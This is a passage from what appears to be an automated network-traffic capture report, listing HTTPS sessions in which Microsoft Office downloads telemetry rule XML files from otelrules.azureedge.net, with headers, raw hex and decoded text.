                                                                                                              2024-12-05 09:38:52 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              92192.168.2.64983413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:52 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:52 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:52 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1358
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                              ETag: "0x8DC582BE6431446"
                                                                                                              x-ms-request-id: 0b7a0bcb-d01e-0082-68c5-45e489000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093852Z-1746fd949bd9x4mhhC1EWRb76n00000002mg000000002ayh
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:52 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              93192.168.2.64982913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:53 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:54 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:54 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1393
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                              ETag: "0x8DC582BE39DFC9B"
                                                                                                              x-ms-request-id: 0164fc08-001e-0014-50c3-465151000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093854Z-1746fd949bdl6zq5hC1EWRf3ws0000000290000000000zd7
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:54 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              94192.168.2.64983613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:54 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:54 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:54 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1358
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                              ETag: "0x8DC582BE022ECC5"
                                                                                                              x-ms-request-id: 76609676-a01e-0070-74cc-45573b000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093854Z-1746fd949bdqpttnhC1EWRe1wg000000028g000000003zm2
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:54 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              95192.168.2.64983713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:54 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:54 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:54 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1389
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                              ETag: "0x8DC582BE10A6BC1"
                                                                                                              x-ms-request-id: 1a13e7cb-001e-0049-3bcd-455bd5000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093854Z-1746fd949bd4w8sthC1EWR7004000000025000000000a6wq
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:54 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              96192.168.2.64983813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:54 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:54 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:54 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1352
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                              ETag: "0x8DC582BE9DEEE28"
                                                                                                              x-ms-request-id: 88657856-001e-008d-2ccc-45d91e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093854Z-1746fd949bdtlp5chC1EWRq1v400000002eg000000004uz4
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:54 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              97192.168.2.64983913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:54 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:54 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:54 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1405
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                              ETag: "0x8DC582BE12B5C71"
                                                                                                              x-ms-request-id: c77b1400-401e-0048-71d2-450409000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093854Z-1746fd949bd6ztf6hC1EWRvq2s00000002900000000005bt
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:54 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              98192.168.2.64984013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:55 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:56 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:56 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1368
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                              ETag: "0x8DC582BDDC22447"
                                                                                                              x-ms-request-id: 4edcd523-801e-0047-60d3-457265000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093856Z-1746fd949bdzd2qvhC1EWRcygw0000000270000000005ex1
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:56 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              99192.168.2.64984113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:56 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:56 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:56 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1401
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                              ETag: "0x8DC582BE055B528"
                                                                                                              x-ms-request-id: d3398a04-c01e-007a-0bce-45b877000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093856Z-1746fd949bdfg4slhC1EWR34t000000002900000000093mq
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:56 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              100192.168.2.64984213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:56 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:56 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:56 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1364
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                              ETag: "0x8DC582BE1223606"
                                                                                                              x-ms-request-id: 4ddf438b-c01e-0049-57cd-45ac27000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093856Z-1746fd949bd54zxghC1EWRzre400000002s00000000069ak
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:56 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              101192.168.2.64984313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:56 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:56 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:56 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1397
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                              ETag: "0x8DC582BE7262739"
                                                                                                              x-ms-request-id: c8e56ad6-f01e-005d-13cc-4513ba000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093856Z-1746fd949bdw2rg8hC1EWR11u400000002tg000000003qyr
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:56 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
